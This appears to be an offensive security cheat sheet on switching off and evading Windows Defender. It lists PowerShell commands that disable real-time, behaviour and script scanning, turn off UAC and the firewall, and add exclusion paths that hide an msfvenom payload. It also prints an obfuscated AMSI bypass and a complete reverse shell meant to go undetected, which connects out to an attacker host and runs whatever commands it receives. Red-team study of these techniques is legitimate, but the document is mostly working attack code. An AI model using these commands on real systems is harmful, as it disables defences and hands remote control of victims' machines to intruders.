Disable and Bypass Defender
Check if Defender is enabled
# Check if Defender is enabled
Get-MpComputerStatus
Get-MpComputerStatus | Select AntivirusEnabled
# Check if defensive modules are enabled
Get-MpComputerStatus | Select RealTimeProtectionEnabled, IoavProtectionEnabled,AntispywareEnabled | FL
# Check if tamper protection is enabled
Get-MpComputerStatus | Select IsTamperProtected,RealTimeProtectionEnabled | FL
Alternative Antivirus products
In some cases if it appears Defender is not enabled an alternative Antivirus solution may be in effect.
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct

Decoding the value of ProductState to hex can help identify which Antivirus is enabled
'0x{0:x}' -f <ProductState>
'0x{0:x}' -f 393472
From the values below anything that has a 10 starting from the fourth numerical position indicates On and anything else indicates Off. As below we can see BitDefender is enabled and Windows Defender is disabled.

Turning off features
Note: Disabling UAC
is advisable before attempting to turn features off. In testing some changes prompted for user confirmation before allowing change.
cmd.exe /c "C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
Note: If Tamper protection is enabled you will not be able to turn off Defender by CMD or PowerShell. You can however, still create an exclusion.
# Disables realtime monitoring
Set-MpPreference -DisableRealtimeMonitoring $true
# Disables scanning for downloaded files or attachments
Set-MpPreference -DisableIOAVProtection $true
# Disable behaviour monitoring
Set-MPPreference -DisableBehaviourMonitoring $true
# Make exclusion for a certain folder
Add-MpPreference -ExclusionPath "C:\Windows\Temp"
# Disables cloud detection
Set-MPPreference -DisableBlockAtFirstSeen $true
# Disables scanning of .pst and other email formats
Set-MPPreference -DisableEmailScanning $true
# Disables script scanning during malware scans
Set-MPPReference -DisableScriptScanning $true
# Exclude files by extension
Set-MpPreference -ExclusionExtension "ps1"
# Turn off everything and set exclusion to "C:\Windows\Temp"
Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MPPreference -DisableBehaviorMonitoring $true;Set-MPPreference -DisableBlockAtFirstSeen $true;Set-MPPreference -DisableEmailScanning $true;Set-MPPReference -DisableScriptScanning $true;Set-MpPreference -DisableIOAVProtection $true;Add-MpPreference -ExclusionPath "C:\Windows\Temp"
Bypassing with Path Exclusions
With reference to above we see its possible to use PowerShell
to exclude Windows Defender from taking action on certain paths, using path exclusions.
Add-MpPreference -ExclusionPath "C:\Windows\Temp"
Running curl
on a msfvenom
payload where the output folder is outside of the defined exclusion path:

Running the same command again however, this time specifying the excluded path from Defender C:\temp
we see Defender has not picked up the malware.

Over on the attackers machine we see the msfvenom
payload has connected back. Under normal circumstances AV will have no issues discovering this msfvenom payload.

Firewall
Disable all Firewall profiles (Requires Admin privileges).
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
AMSI Bypass
Tools
Amsi.Fail: https://amsi.fail/
AMSITrigger: https://github.com/RythmStick/AMSITrigger
PowerShell snippets
$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)
Undetected Reverse Shells
$c = New-Object System.Net.Sockets.TCPClient(<IP>,<Port>);
$I = $c.GetStream();
[byte[]]$U = 0..(2-shl15)|%{0};
$U = ([text.encoding]::ASCII).GetBytes("Copyright (C) 2021 Microsoft Corporation. All rights reserved.`n`n")
$I.Write($U,0,$U.Length)
$U = ([text.encoding]::ASCII).GetBytes((Get-Location).Path + '>')
$I.Write($U,0,$U.Length)
while(($k = $I.Read($U, 0, $U.Length)) -ne 0){;$D = (New-Object System.Text.UTF8Encoding).GetString($U,0, $k);
$a = (iex $D 2>&1 | Out-String );
$r = $a + (pwd).Path + '> ';
$m = ([text.encoding]::ASCII).GetBytes($r);
$I.Write($m,0,$m.Length);
$I.Flush()};
$c.Close()
Further AMSI Reading
URL: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
URL: https://amsi.fail/
Resources
Tamper Protection: https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide
Last updated